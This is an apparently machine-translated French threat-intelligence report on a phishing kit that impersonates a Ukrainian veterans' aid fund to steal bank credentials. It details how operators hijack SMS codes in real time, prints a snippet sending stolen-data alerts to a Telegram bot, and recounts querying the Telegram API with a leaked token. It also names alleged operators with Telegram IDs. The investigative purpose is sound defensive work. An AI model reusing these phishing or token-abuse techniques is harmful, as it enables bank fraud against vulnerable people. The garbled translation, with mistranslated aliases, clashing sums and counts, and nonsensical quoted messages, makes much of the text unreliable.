5
Les banques dans le collimateur
6
Appels API pour lever le masquage
2
Projets parallèles de phishing
<30
Quelques minutes pour une analyse complète
Déclaration relative aux sponsors(cliquez pour développer)
Voici le sponsor officiel de cette enquête
🏆 NICENIC International Group Co., Limited 🏆
Le plus fait autorité registraire qui collabore avec Netcraft (en trompant leur système) · Fournisseur officiel de domaines pour le La plateforme de vente de drogues Kraken · Fournisseur proposant des remises sur les achats en gros · Fidèle adepte de la « L'escroc typique » La communauté VK — mais n'a toujours pas suivi de formation sur l'anonymat
200 $
Prix .ru
120 roubles réels
0
Signalements d'abus
mis en œuvre
- Bien qu'il se présente comme « chinois » (de Hong Kong), le créateur est originaire de Gorlovka, République populaire de Donetsk. Le logo chinois est purement décoratif — tout comme leurs conditions d'utilisation
- Assure Prise en charge de la langue russe via VKontakte et Telegram, vend
.ru pour 200 $ alors que reg.ru facture 120 roubles (~1,30 $) - Avis négatifs sur Trustpilot mentionnant domaines liés au marché des stupéfiants disparaître mystérieusement. Une coïncidence ? Certainement pas
- Un abonné actif de « L'escroc typique » (Fraudeur type) Communauté VK — quand votre hébergeur suit des groupes d'escrocs, on sait à qui il s'adresse
- Collabore avec Netcraft juste assez pour éviter la radiation, tout en conservant l'infrastructure nécessaire aux domaines liés au phishing, aux jeux d'argent et aux stupéfiants
Pendant ce temps, dans « L'escroc typique » :
Une promesse faite à notre sponsor : Quand ce message publié par « Типичный Мошенник » deviendra réalité — et d'après ce que nous savons, ce n'est qu'une question de quand, pas if — Toute notre équipe va s'inscrire sur VKontakte et s'abonner à la communauté. Considérez cela comme notre ovation. 👏
* Il s'agit d'une satire. NiceNIC n'a pas financé cette enquête. L'entreprise l'a toutefois rendue nécessaire en refusant de donner suite à nos signalements d'abus pendant plus de cinq jours. Tout ce qui précède repose sur des informations accessibles au public et sur notre expérience opérationnelle. Lisez notre dossier complet sur NiceNIC →
Ce que PhishDestroy a découvert
Le 20 mars 2026, le pipeline automatisé de détection des menaces de PhishDestroy a signalé dopomogvoina[.]sbs — un domaine récemment enregistré hébergeant un site de hameçonnage se faisant passer pour « Le bouclier du défenseur » (« Shield of the Defender »), une fausse fondation d'aide militaire ukrainienne. Le site cible les anciens combattants ukrainiens, les blessés de guerre et les familles des soldats tombés au combat, en leur promettant une aide financière de l'État tout en dérobant les identifiants bancaires de cinq des plus grandes banques ukrainiennes.
Vous trouverez ci-dessous une analyse détaillée de tous les éléments mis au jour par notre analyse automatisée : les techniques d'ingénierie sociale, l'infrastructure technique, le système de contrôle en temps réel des opérateurs, ainsi que l'identité des personnes qui le gèrent.
Analyse d'impact
Ce site s'adresse tout particulièrement aux personnes les plus vulnérables : les anciens combattants souffrant de stress post-traumatique, les familles de soldats tombés au combat qui sollicitent une aide de l'État, ainsi que les militaires blessés confrontés à des procédures administratives complexes. Le vol de chaque identifiant peut entraîner la prise de contrôle totale d'un compte en quelques minutes.
Section 1 : L'appât — La fausse fondation d'aide militaire
Le domaine dopomogvoina[.]sbs a été enregistrée le 20 mars 2026 par l'intermédiaire de NICENIC International Group Co., Limited, un registraire connu pour sa lenteur, voire son absence totale, dans la gestion des cas d'abus. Le .sbs Le TLD (Side-By-Side) est un gTLD peu coûteux souvent utilisé pour mettre en place des infrastructures de phishing jetables.
Le site se présente comme un portail d'aide professionnel lié aux pouvoirs publics. Un drapeau ukrainien occupe tout l'en-tête, des images militaires lui confèrent une apparence d'authenticité, et le contenu est soigneusement rédigé en ukrainien dans un style bureaucratique qui rappelle les programmes gouvernementaux officiels.
Capture d'écran 5 — La page d'accueil du site de hameçonnage se faisant passer pour « Щит Захисника » (Bouclier du Défenseur).
Pour se donner une apparence de crédibilité, les opérateurs ont créé un compteur de statistiques bien visible sur la page d'accueil :
- 2,847 applications — ce qui laisse entendre que des milliers de personnes ont déjà reçu de l'aide
- 47,2 millions de ₴ distribués — un chiffre élevé mais plausible à l'UAH
- 19 programmes — ce qui laisse entrevoir une opération de grande envergure, impliquant plusieurs programmes
Ces chiffres sont purement fictifs; ils sont intégrés directement dans le code source de la page, sans aucun lien avec le serveur. Ils n'ont qu'un seul but : servir de preuve sociale pour surmonter les hésitations de la victime.
Section 2 : Le piège — 5 banques, un seul objectif
Après avoir cliqué sur « Подати заявку » (Soumettre la demande), la victime se retrouve face à un écran lui permettant de choisir une banque. Cinq des plus grandes banques de détail ukrainiennes s'affichent parmi les options, chacune avec son identité visuelle et son logo officiels. C'est à ce moment-là que l'ingénierie sociale passe de la manipulation émotionnelle au vol technique.
Capture d'écran 6 — Écran de sélection de la banque. Chaque option déclenche une séquence personnalisée de vol d'identifiants.
L'analyse du bundle JavaScript du site a révélé que chaque banque dispose d'un séquence unique de collecte d'identifiants en plusieurs étapes, adapté au processus d'authentification réel de cette banque :
PrivatBank
ConnexionMot de passeNuméro d'identification personnelSMS
un seul compte bancaire
ConnexionNuméro d'identification personnelSMSE-mail
Oschadbank
ConnexionVérifierSMS
Ukrsibbank
ConnexionNuméro d'identification personnelSMS
Le déroulement de l'attaque est le même pour toutes les banques :
Fausse page d'aide
Choix de la banque
Cloner la connexion
Interception de l'authentification à deux facteurs
Prise de contrôle d'un compte
Capture d'écran 7 — Page de connexion clonée de PrivatBank.
Capture d'écran 9 — Page de connexion PUMB clonée.
Capture d'écran 10 — Déroulement complet de l'attaque : de la fausse page d'aide militaire au vol d'identifiants et à la prise de contrôle du compte, en passant par la sélection de la banque.
La pile technologique : Application monopage React interface utilisateur fournie via CDN Cloudflare, avec un Express.js un backend chargé de l'exfiltration des identifiants. L'architecture React permet de créer des formulaires en plusieurs étapes qui s'intègrent parfaitement et sont pratiquement impossibles à distinguer des interfaces bancaires légitimes.
Section 3 : Commande en temps réel par l'opérateur
Il ne s'agit pas d'un simple outil de collecte d'identifiants utilisant une base de données statique. Le kit de phishing comprend un Panneau de contrôle WebSocket en direct qui permet à un opérateur humain de contrôler chaque session de la victime en temps réel.
Le point de terminaison WebSocket à l'adresse wss://dopomogvoina[.]sbs/ws prend en charge les types de messages suivants :
register — New victim session created
update_user_data — Stolen credentials transmitted to operator
next_step — Operator advances victim to next theft stage
create_application — Victim starts "aid application"
answer_question — Operator sends custom prompt to victim
Grâce à ce contrôle en temps réel, l'opérateur peut :
- Forcer un état d'attente — afficher le message « Traitement de votre demande... » pendant qu'ils se connectent au véritable compte bancaire de la victime
- Rediriger vers une étape spécifique — demander à nouveau un code SMS si le premier a expiré
- Afficher de faux messages d'erreur — « Code invalide, veuillez le saisir à nouveau » pour récupérer plusieurs jetons d'authentification à deux facteurs
- Poser des questions personnalisées — demander la date de naissance, le numéro de carte ou toute autre information en cours de session
Pourquoi est-ce dangereux ?
Le contrôle en temps réel par l'opérateur permet de contourner les protections 2FA basées sur le temps. L'opérateur intercepte le code SMS et l'utilise pendant sa période de validité — généralement comprise entre 30 et 120 secondes — tandis que la victime reste figée devant une fausse animation « en cours de traitement ».
Capture d'écran 8 — Formulaire de saisie du numéro de téléphone utilisé pour lancer le vol d'identifiants.
Capture d'écran 11 — Panneau de contrôle en temps réel de l'opérateur permettant de gérer les sessions des victimes.
L'ensemble des données volées à chaque session : phone, password, PIN, SMS code, card number, date of birth, et email.
Section 4 : Dans les coulisses de Cloudflare — Deux projets, un seul serveur
Le proxy Cloudflare masque le serveur d'origine, mais le pipeline d'analyse de l'infrastructure de PhishDestroy a permis d'identifier la véritable adresse IP d'origine : 45.131.214[.]148, hébergé sur RapidSeedbox / LeaseWeb aux Pays-Bas.
Un détail essentiel : dopomogvoina[.]sbs est acheminé via Cloudflare, en masquant son adresse IP d'origine. Mais notre système suit également hlpforvpeople[.]sbs — un nom de domaine apparenté, enregistré auprès du même bureau d'enregistrement NICENIC et présentant des similitudes. Ce nom de domaine est PAS derrière Cloudflare, en exposant directement son adresse IP d'origine : 45.131.214[.]148.
Se connecter directement à cette adresse IP — sans Host en-tête — a révélé quelque chose d'inattendu : un un site de hameçonnage totalement différent. Au lieu de l'aide militaire ukrainienne, le serveur virtuel par défaut a servi « Carte d'assurance maladie », une opération de hameçonnage visant une assurance maladie indonésienne. Même serveur, des victimes totalement différentes, un pays totalement différent.
Même serveur, mêmes opérateurs, victimes différentes
- Projet 1 : L'aide militaire ukrainienne → vole les identifiants bancaires d'anciens combattants
- Projet 2 : L'assurance maladie indonésienne → vole les identifiants de santé des citoyens
- Même pile Express.js, même panneau de contrôle en temps réel via WebSocket
- Même interface de gestion de serveur BT-Panel (宝塔)
- Domaine C2 du deuxième projet :
rezervtemka[.]cc — un panneau de phishing connu répertorié dans la base de données des menaces de PhishDestroy - Commentaires en russe dans le code source du projet indonésien, les mêmes développeurs utilisant le CIS
Capture d'écran 12 — Deux opérations de phishing parallèles partageant le même serveur d'origine : aide militaire ukrainienne (dopomogvoina) et assurance maladie indonésienne (HealthCare ID).
Le modèle de phishing indonésien est un kit connu répertorié dans la base de données de renseignements sur les menaces de PhishDestroy. Nous avons constaté que des variantes de ce modèle précis ont été déployées dans toute l'Asie du Sud-Est, ciblant des institutions financières indonésiennes, thaïlandaises et vietnamiennes. Les opérateurs se contentent de remplacer les modèles spécifiques à chaque pays tout en réutilisant la même infrastructure de base.
Des criminels sans scrupules
Voici la réalité des opérations modernes de phishing :
ces escrocs se moquent bien de savoir qui ils volent. Des vétérans ukrainiens en quête d'aide militaire, des travailleurs indonésiens souscrivant une assurance maladie… La cible change en fonction du modèle qui rapporte le plus. Les mêmes opérateurs russophones mènent ces deux campagnes simultanément depuis le même serveur, passant d'une victime à l'autre dans différents pays comme on zappe entre les chaînes de télévision. Aujourd'hui, ce sont les banques ukrainiennes. Demain, ce pourrait être les banques israéliennes — comme Bonya l'avait déjà évoqué en mars 2026.
Section 5 : Le fichier config.json qui a tout dévoilé
Voici comment un seul fichier mal configuré a fait capoter toute l'opération — étape par étape.
Après avoir identifié le deuxième projet du serveur d'origine, celui de PhishDestroy JS Analyzer — notre outil automatisé d'analyse JavaScript — a été orienté vers l'ensemble de fichiers du site de phishing indonésien à l'adresse https://45.131.214[.]148/assets/index-ZMQxHb_h.js. L'analyseur a extrait tous les points de terminaison API, les URL externes et les chemins de configuration du fichier JavaScript de 335 Ko. Parmi les résultats :
- Cinq points de terminaison API à l'adresse
rezervtemka[.]cc — le panneau C2 pour la vérification des identifiants - Une connexion WebSocket vers
wss://rezervtemka[.]cc - Intégration du pixel Facebook pour le suivi des victimes
- Une référence à
/config.json — chargé au moment de l'exécution pour la configuration du bot Telegram
En suivant cette piste, nous avons récupéré /config.json à partir de l'adresse IP d'origine. Le fichier était accessible sans aucune authentification — il se trouvait dans le répertoire racine du site web, où n'importe qui pouvait le lire :
async function loadConfig() {
const response = await fetch('/config.json');
// ...
}
async function sendNotification() {
const cfg = await loadConfig();
await fetch(`https://api.telegram.org/bot${cfg.bot_token}/sendMessage`, {
method: 'POST',
body: JSON.stringify({ chat_id: cfg.chat_id, text: message })
});
}
Le /config.json le fichier était accessible directement depuis l'adresse IP d'origine — Pas d'authentification, pas de contrôle d'accès, juste un simple fichier JSON situé dans le répertoire racine du site web:
{
"bot_token": "8724623843:AAFXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
"chat_id": "-100XXXXXXXXXX"
}
Un jeton de bot Telegram fait office à la fois de nom d'utilisateur et de mot de passe. Quiconque dispose de ce jeton peut effectuer des appels API au nom de ce bot. Les administrateurs ont laissé le leur dans un fichier accessible au public. Six appels API plus tard, nous avions tout ce qu'il fallait :
getMe — Identifiant du bot : « MonettiCRM » (@MonettiCRM_bot)
Récupérer la conversation correspondant à l'identifiant de conversation. — Nom du groupe : « Idr card » avec un lien d'invitation actif
getChatAdministrators — 3 administrateurs, dont le créateur du groupe
getChat(creator_id) — Créateur : @monettiescobar, Telegram Premium, profil professionnel, fuseau horaire UTC+3
getChat(admin2_id) — Deuxième administrateur : profil vide, soupçonné d'être un compte secondaire
obtenir le nombre de membres du chat — 5 membres au total dans le groupe des opérateurs
Capture d'écran 13 — La chaîne OSINT complète : du fichier config.json exposé à l'identification complète de l'opérateur en 6 appels API.
D'un simple fichier mal configuré à l'identification complète des opérateurs en six requêtes HTTP. Pas d'exploitation de vulnérabilités, pas d'accès non autorisé — juste des appels standard à l'API du bot Telegram utilisant un jeton que les opérateurs eux-mêmes avaient laissé accessible.
Section 6 : Les opérateurs
Remarque sur la créativité criminelle
Ce qui suit est un véritable cours magistral sur les pires choix d'alias. Nous avons MONETTI ESCOBAR — car rien ne vaut un nom inspiré du baron de la drogue le plus célèbre de l'histoire pour passer inaperçu. Et puis il y a Prends ton temps, également connu sous le nom de Père du droit (littéralement « Papa-Voleur-de-droit » — une référence malicieuse à la hiérarchie criminelle russe), Bien, et bubullikk. Et pour finir Devoys, dont le pseudonyme @devosus On dirait étrangement « dev ops us » — un développeur qui a intégré son intitulé de poste à son nom d'utilisateur. Ce sont ces personnes-là qui pensaient pouvoir déjouer les systèmes automatisés de veille sur les menaces. Spoiler : elles n'y sont pas parvenues.
Capture d'écran 14 — Le groupe d'opérateurs Telegram « Idr card », révélé à la suite de la fuite du jeton du bot.
Propriétaire / Créateur
MONETTI ESCOBAR
@monettiescobar
Identifiant Telegram : 8135223234
Telegram Premium, profil professionnel
Fuseau horaire : UTC+3 (région de la CEI)
10 messages publics — sécurité opérationnelle stricte
Chat TraFFeeQMedusa Google AdsChaîne Deepfakes
Opérateur / Circulation
Prends ton temps
Bonjour
Identifiant Telegram : 6242202706
Alias : PapaZakonVor, Boa, bubullikk
261 messages répartis dans 12 groupes
DC2 — Amsterdam, Pays-Bas
CryptoGrabMarché STYXNiveau CCEMPIRE CHATSolution Phoenix
Développeur / Programmeur
Devoys
@devosus
Identifiant Telegram : 8213612730
Développeur de kits de phishing — les opérateurs l'appellent « codeur »
On leur a demandé de « réfléchir à la défense » lorsque la faille a été découverte
Conçu pour un impact minimal sur l'environnement
Faire ses courses @devosus ≈ « dev ops us » — intitulé du poste comme nom d'utilisateur
Concepteur de kitsInfrastructuresSécurité
MONETTI ESCOBAR — Le Patron
MONETTI applique des mesures de sécurité opérationnelle strictes — uniquement 10 messages publics répartis en deux groupes. Mais ce sont ces groupes qui en disent long : Chat TraFFeeQ (arbitrage de trafic à des fins frauduleuses), Medusa Google Ads (pratiques de black hat dans Google Ads), ainsi qu'un Chaîne Deepfakes. Son profil professionnel sur Telegram indique « Есть предложение » (« J'ai une proposition à vous faire ») — qui font ouvertement la promotion de leurs services. Le fuseau horaire UTC+3 (celui de Moscou, Minsk et Kiev) et les horaires d'ouverture 24 h/24, 7 j/7 confirment qu'il s'agit d'une entreprise basée dans la CEI et fonctionnant sans interruption.
Bonya — Le négligent
Contrairement à la rigoureuse sécurité opérationnelle (OPSEC) de MONETTI, Bonya (ancien pseudonyme : Père du droit — en gros « DaddyThiefByLaw ») a laissé une trace numérique considérable — 261 messages répartis sur 12 groupes clandestins. Son historique de discussion ressemble à un CV de criminel :
Les propres mots de Bonya (traduit du russe)
- « paris à une cote inférieure à 2,0 » → « Du phishing [pour la sécurité bancaire] version 2.0 » — examiner la compatibilité des kits de phishing avec les nouveaux systèmes de sécurité bancaires
- « C'est difficile de trouver de bons drops » → « Les bons passeurs d'argent sont difficiles à trouver » — trouver des complices pour blanchir de l'argent
- « Viens travailler chez moi au centre culturel » → « Viens travailler dans mon centre d'appels » — recrutement d'opérateurs
- « Y a-t-il ici des gens qui ont déjà travaillé avec des banques israéliennes ? » → « Y a-t-il ici quelqu'un qui a déjà travaillé avec des banques israéliennes ? » — extension à de nouvelles cibles (mars 2026)
- « Je ne vois pas vraiment de logos sur la veste. » → « Je ne vois pas beaucoup de registres financiers » — discussion sur la qualité des identifiants volés
- « Si 1 proxy correspond à 1 ou 2 bancs de courant » → « Un seul mandataire pour seulement une ou deux banques » — discussion sur la sécurité opérationnelle en matière de fraude bancaire
- « Le distributeur automatique a gardé sa carte » → « Son carte a été avalée par le distributeur automatique » — un passeur d'argent leur a volé 60 000 ₴ en prétendant que le distributeur avait avalé la carte. Même les criminels se font escroquer par leurs propres complices.
Les associations auxquelles il appartient brossent un tableau complet : CryptoGrab (pirates de portefeuilles cryptographiques), Marché STYX (marché noir de données volées), Vérificateur de niveau CC (outils de validation des cartes de crédit), EMPIRE CHAT et Solution Phoenix (coordination des activités frauduleuses). Il ne s'agit pas d'un délinquant occasionnel, mais d'une personne profondément impliquée dans l'écosystème de la cybercriminalité.
Devoys — Le développeur
Le pilier technique de l'opération. Conçue pour laisser une empreinte publique minimale — lorsque le groupe a été piraté, Bonya l'a explicitement appelé à la rescousse : « @devosus, pense à la défense avant qu'on nous mette une raclée » — « @devosus, pensons à la défense avant de nous faire botter les fesses. » Sa réaction sarcastique face à cette violation — « quand à Interpol » (« Quand interpoler ») — laisse entendre que ce n'est pas la première fois qu'ils échappent de justesse au pire.
Analyse comportementale : 261 messages décryptés
Le pipeline OSINT de PhishDestroy a collecté et traduit les 261 messages publics provenant de Bonya et provenant de 12 groupes Telegram clandestins (juin 2024 — mars 2026). Traduction automatique via l'API DeepL avec correction manuelle du contexte. Les messages révèlent un profil opérationnel complet — classé ci-dessous par type d'activité criminelle.
Diffusion des messages : 261 messages répartis dans 12 groupes
- 💬ONE|Chat — 91 messages (coordination en matière de fraude)
- Actualités/Vérifications — 37 messages (tentatives d'escroquerie par vérification)
- Rolex | Discussion générale — 28 messages (carding)
- EMPIRE CHAT — 24 messages (marché noir)
- Fbstore — 23 messages (arbitrage de trafic)
- Document Facebook — 22 messages (fraude publicitaire)
- Solution Phoenix — 17 messages (fraude bancaire)
- CryptoGrab — 11 messages (consommation de cryptomonnaie)
- Marché STYX — 2 messages (marché noir)
- Vérificateur de niveau CC — 2 messages (vérification des cartes)
Fraude bancaire et hameçonnage
💬ONE|ChatMars 2025
« Il n'y a que 2,0 phish ici »
Et là, les fiches pour un courant de 2,0 A
Examen de la compatibilité des kits de phishing avec les nouveaux protocoles de sécurité bancaires
💬ONE|ChatMars 2025
« Mec, ici, on ne vend rien sur Phish, c'est Phish pour le paiement. »
Mec, ici, on ne vend rien avec des jetons, il faut payer en jetons
Distinguer le phishing à des fins de vente du phishing à des fins de vol direct
Solution PhoenixÀ partir de 2026
« Y a-t-il ici des personnes qui ont déjà travaillé avec des banques en Israël ? »
Y a-t-il ici des personnes qui ont déjà travaillé avec des banques israéliennes ?
Extension des activités au secteur bancaire israélien — cinq jours avant notre enquête
Rolex | Discussion généraleSeptembre 2024
« Si un seul mandataire, seulement une ou deux banques »
Si 1 proxy, 1 à 2 ampères
Sécurité opérationnelle face à la fraude multi-bancaire : un proxy pour 1 à 2 banques afin d'éviter la détection
Rolex | Discussion généraleSeptembre 2024
« Je ne vois pas grand-chose en matière de registres financiers »
Je ne vois pas vraiment de logos sur la Finka
Critiques concernant la qualité des identifiants bancaires volés sur les marchés clandestins
Les passeurs d'argent et le blanchiment d'argent
💬ONE|ChatMars 2025
« Les bonnes affaires sont rares »
C'est difficile de trouver de bons drops
« Drops » = des passeurs d'argent chargés d'encaisser des fonds volés. Ils se plaignent de la difficulté à recruter.
💬ONE|ChatMars 2025
« Viens travailler dans mon centre d'appels »
Venez travailler chez moi au centre culturel
Recrutement actif de personnel pour un centre d'appels spécialisé dans la fraude
ActualitésJuin 2024
« On nous a volé 60 000 euros »
On nous a volé 60 000
Un passeur d'argent a volé 60 000 ₴ aux escrocs eux-mêmes. Une justice ironique.
ActualitésJuin 2024
« Mais comment un distributeur a-t-il pu avaler la carte, bon sang ? »
Mais putain, comment un distributeur a-t-il pu avaler ma carte ?
Le passeur a prétendu que le distributeur avait « avalé » la carte pour s'emparer des fonds volés. Des escrocs qui arnaquent d'autres escrocs.
ActualitésJuin 2024
« Elle nous l'a transféré, mais nous n'avions pas le compte principal pour transférer l'argent »
Elle nous l'a refilée, mais nous n'avions pas les fonds nécessaires pour transférer l'argent
Description de la chaîne de blanchiment : victime → compte intermédiaire → passeur d'argent principal
Fraude au trafic et abus publicitaires
EMPIRE CHATÀ partir de 2026
« Je n'utilise pas Google, juste Facebook »
Bon, je ne travaille pas avec Google, seulement avec Facebook
Spécialisé dans la fraude publicitaire sur Facebook — redirigeant le trafic vers des pages de phishing
Document FacebookFévrier 2026
« Moi non plus, je n'investirais pas % du budget publicitaire sans garant »
Moi non plus, je ne verserais pas d'argent sur la base d'un pourcentage des dépenses sans garantie
Négociation des conditions de paiement pour la diffusion de campagnes publicitaires frauduleuses sur Facebook
CryptoGrabJanvier 2025
« J'ai essayé l'AML sur Facebook pour cibler le marché américain, mais je n'ai trouvé aucune configuration valable en ligne. »
J'ai essayé de trouver des liens sur Facebook, mais je n'ai pas trouvé de liens intéressants, même parmi les plus anciens, sur Internet.
Tentative d'utilisation des publicités Facebook pour mener des escroqueries liées à la lutte contre le blanchiment d'argent visant des victimes américaines
Profil psychologique : Bonya
Le corpus de 261 messages révèle une cybercriminel de niveau intermédiaire avec des activités variées : hameçonnage bancaire, réseaux de blanchiment d'argent, fraude publicitaire sur Facebook, détournement de cryptomonnaies et vérification de cartes de crédit. Principales caractéristiques :
- Négligence opérationnelle — 261 messages publiés dans des groupes publics à partir d'un seul compte. L'utilisation de plusieurs pseudonymes (PapaZakonVor → Boa → Bonya) suggère une prise de conscience des règles de sécurité opérationnelle (OPSEC), mais un manquement à leur application
- L'état d'esprit en matière de recrutement — invite activement les gens à « venir travailler dans mon centre d'appels » et vend son savoir-faire opérationnel contre de l'argent
- L'indifférence des victimes — aborde les cibles ukrainiennes, européennes, israéliennes et américaines avec le même détachement. La géographie n'est qu'une variable dans l'équation de la fraude
- Problèmes de confiance — a été trahi par son propre passeur d’argent pour 60 000 pesos. Cela reflète ironiquement la méfiance qu’il suscite chez ses victimes
- axé sur l'expansion — pas plus tard qu'en mars 2026, en recherchant activement de nouveaux marchés bancaires (Israël), ce qui laisse penser que l'opération de phishing ukrainienne n'est qu'une des nombreuses opérations menées de front
Bonya : Journal complet des messages (253 messages répartis dans 12 groupes)
-- Phoenix Solution (16 messages) --
B
Prends ton temps2026-03-17 14:22
Y a-t-il ici des personnes qui ont déjà travaillé avec des banques en Israël ?Y a-t-il ici des personnes qui ont déjà travaillé avec des banques israéliennes ?
B
Prends ton temps2026-03-17 14:22
travaillant en silence, eux aussi.nous travaillons aussi en silence
B
Prends ton temps2026-03-17 14:17
Comment ça va ?Comment ça va ?
B
Prends ton temps2026-03-17 14:17
Bonjour à tousBonjour à tous
B
Prends ton temps2026-03-15 19:02
Bon, tout est pratiquement réglé maintenant.Bon, dans l'ensemble, tout est déjà rentré dans l'ordre
B
Prends ton temps2026-03-15 19:02
Bon, c'est un peu compliquéBon, on a quand même causé quelques soucis
B
Prends ton temps2026-03-15 19:01
Ouais, moi aussi j'ai bossé en coulisses ces derniers temps, c'est la merde.Ouais, moi aussi, j'en ai marre de tout ce boulot en sous-main
B
Prends ton temps2026-03-15 19:00
Comment s'est passé ton jour de congé ?Comment s'est passé le week-end ?
B
Prends ton temps2026-03-15 19:00
Vous tous.À tous
B
Prends ton temps2026-03-14 14:29
Il n'est plus vraiment anonyme maintenant que tout le monde sait qu'il s'agit de Marik.Il n'est plus vraiment anonyme, puisque tout le monde sait qui est Marik
B
Prends ton temps2026-03-14 14:24
RenaîtreRenaître
B
Prends ton temps2026-03-14 14:24
Ahahahahahahahahahahahahahahahahahahahahahahah.Ahahahahahahahahahaha
B
Prends ton temps2026-03-14 14:23
J'étais déçu de voir que le salon de discussion avait disparu.J'étais vraiment déçu quand j'ai vu que le chat avait disparu
B
Prends ton temps2026-03-14 14:22
Je croyais que je ne te retrouverais jamais.Je croyais que je ne vous retrouverais plus
B
Prends ton temps2026-03-14 14:22
MonКу
B
Prends ton temps2026-03-14 14:22
PutainPutain
-- 👨⚕️ FB-DOC — Discussion sur l'arbitrage de trafic (21 messages) --
B
Prends ton temps2026-03-15 07:23
@fbdoc21@fbdoc21
B
Prends ton temps2026-03-15 07:20
Donne-toi un coup sur le front avec ta bite.Je vais me frapper le front avec ma bite
B
Prends ton temps2026-03-06 15:18
C'est comme mettre cinq étoiles sur un écran de 2,5 pouces 😂.Comme sur la capture d'écran : 2,5😂
B
Prends ton temps2026-02-19 17:05
à vous tous.à vous tous
B
Prends ton temps2026-02-19 17:04
Si tu conclus une affaire, je vais bien rigoler.Si tu ouvres une position, je vais te chier dessus
B
Prends ton temps2026-02-19 17:04
continentale ?Continental ?
B
Prends ton temps2026-02-19 17:04
La voilà donc.Eh bien, voilà qu'elle est d'accord
B
Prends ton temps2026-02-19 17:01
Veillez donc toujours à vérifier les antécédents lorsque vous demandez un garant.Alors, vérifiez toujours lorsque vous posez des questions sur la garantie
B
Prends ton temps2026-02-19 17:00
Il a demandé s'il fallait un garant, puis il a disparu aussitôt.Il a posé une question sur le garant et a disparu aussitôt
B
Prends ton temps2026-02-19 17:00
C'est Carina.Oh, Karina
B
Prends ton temps2026-02-19 16:59
Tu vas donc faire appel à un garant ?Alors, tu vas chez Garant ?
B
Prends ton temps2026-02-19 16:57
Moi non plus, je n'accorderais pas de crédit sur la base d'un pourcentage des dépenses sans garant.Moi non plus, je ne verserais pas d'argent sur la base d'un pourcentage des dépenses sans garantie
B
Prends ton temps2026-02-19 16:57
я?я?
B
Prends ton temps2026-02-19 16:57
Bon, elle a posté des captures d'écran et toi, tu ne m'as rien donné.Bon, elle a posté des captures d'écran, mais toi, tu n'as rien mis
B
Prends ton temps2026-02-19 16:56
regarde les captures d'écran qu'elle a postéesregarde les captures d'écran qu'elle a postées
B
Prends ton temps2026-02-19 16:55
Il n'a pas parlé d'un garant ?Il n'a pas parlé du garant ?
B
Prends ton temps2026-02-19 16:54
T'es un dingue 😂T'es un vrai taré 😂
B
Prends ton temps2026-02-19 16:53
Vous avez demandé un garant.Tu as demandé au garant
B
Prends ton temps2026-02-19 16:52
oùà quel endroit
B
Prends ton temps2026-02-17 14:37
Qui va fournir un magasin en voitures de qualité ?Qui peut me recommander un site de vente en ligne proposant de belles voitures ?
B
Prends ton temps2026-02-17 12:10
Où tu veux, ils s'en chargeront pour toi 😂N'importe où, s'ils en ont envie, ils te le feront 😂
-- EMPIRE CHAT (24 messages) --
B
Prends ton temps2026-03-14 13:17
J'ai déjà trouvé comment faire, mais je suis trop paresseux pour l'expliquer.J'ai déjà compris comment faire, mais je n'ai pas envie de l'expliquer
B
Prends ton temps2026-03-14 13:17
Il va te mettre une raclée, quoi qu'il arrive.Quoi qu'il arrive, il va te rouler
B
Prends ton temps2026-03-12 17:16
De différentes manières.Selon les cas
B
Prends ton temps2026-03-12 17:08
+ En plus, il y a beaucoup d'orages en ce moment.+ Il y a de violentes tempêtes en ce moment
B
Prends ton temps2026-03-12 17:07
Si c'est noir, je parie que...Si j'avais les noirs, je parierais
B
Prends ton temps2026-03-12 17:07
Ça dépend du type d'offre; si c'est une offre « blanche », oui.Ça dépend de l'offre : si c'est une offre « blanche », alors oui
B
Prends ton temps2026-03-12 17:06
Ce sont deux mondes à partCe sont deux mondes différents
B
Prends ton temps2026-03-12 17:06
Il n'y en a pas d'autreIl n'y en a pas d'autre
B
Prends ton temps2026-03-12 17:06
Vous pouvez configurer le système de manière à ce que Seuls les PCOn peut y configurer pour que seuls les PC soient pris en compte
B
Prends ton temps2026-03-12 17:05
Google n'est pas aussi efficace que je le crois.Google n'est pas aussi efficace qu'à mon avis
B
Prends ton temps2026-03-12 17:05
Eh bien, je ne cherche pas sur Google, je suis juste sur Facebook.Bon, je ne travaille pas avec Google, seulement avec Facebook
B
Prends ton temps2026-03-12 17:05
À condition de devoir trouver une ligature à un moment ou à un autre.À condition qu'il faille encore rassembler tout ce bazar et trouver une solution
B
Prends ton temps2026-03-12 17:04
Les rebuts, les ackeys qui s'envolent comme des tempêtes. Etc.Les rejets, les batteries partent en fumée, c'est comme ça. Etc.
B
Prends ton temps2026-03-12 17:04
Tout n'est pas rose, mon pote.C'est pas tout, mon pote, c'est de la petite bière
B
Prends ton temps2026-03-12 17:03
Tous les contrats de maintenance régulière des systèmes de climatisation, avec une plus grande fiabilitéToutes les batteries Air habituelles avec la meilleure autonomie
B
Prends ton temps2026-03-12 17:03
Il n'y a actuellement aucune agence de qualité sur le marché.Il n'y a pas de bonnes agences sur le marché en ce moment
B
Prends ton temps2026-03-12 17:02
Plus angoissant qu'effrayantC'est plutôt stressant que flippant
B
Prends ton temps2026-03-12 17:02
La crypto, l'instinct du jeu et la négritude s'expriment pleinementLa crypto, les jeux d'argent et le black, je m'en fiche
B
Prends ton temps2026-03-12 17:01
La dernière chose que la ville a faite, c'est de se lancer dans le 2D.La dernière chose qui m'est venue à l'esprit, c'était le jeu City en 2D
B
Prends ton temps2026-03-12 17:01
Si tu cherches à te lancer dans l'escalade, que ce soit par tes propres moyens ou avec un budget limité, sache que les voies en 2D nécessitent un investissement de 1 000 à 2 000 zels pour les essais, et que cet équipement ne durera pas longtemps.Si on cherche à en trouver, que ce soit avec mes propres fonds ou avec le budget, pour trouver ce qui fonctionne en 2D, il faut dépenser 1 000 à 2 000 roubles en tests, et même là, ça ne durera pas longtemps.
B
Prends ton temps2026-03-12 17:00
Je verseJe verse
B
Prends ton temps2026-03-12 16:59
(car il n'existe pas d'exigences de ce type pour les offres des Blancs)C'est pourquoi il n'y a pas de telles exigences pour les offres blanches)
B
Prends ton temps2026-02-14 14:33
Qui a un « dreiner » dans le cadre d'un test AML ? Uniquement avec un dépôt ou un compte prêt sur le compte du garantQuelqu'un aurait-il un drainer pour le test AML ? Uniquement avec dépôt ou prêt à l'emploi ?
B
Prends ton temps2026-01-11 03:14
Il y a quelqu'un sur Facebook, et c'est un pote. J'ai besoin de réapprovisionnement sur Facebook, le prix est négociable.Il y a des gens qui ont posté sur Facebook, et il y a des gros mots. Il faut recharger le compte Facebook; on se mettra d'accord sur le prix.
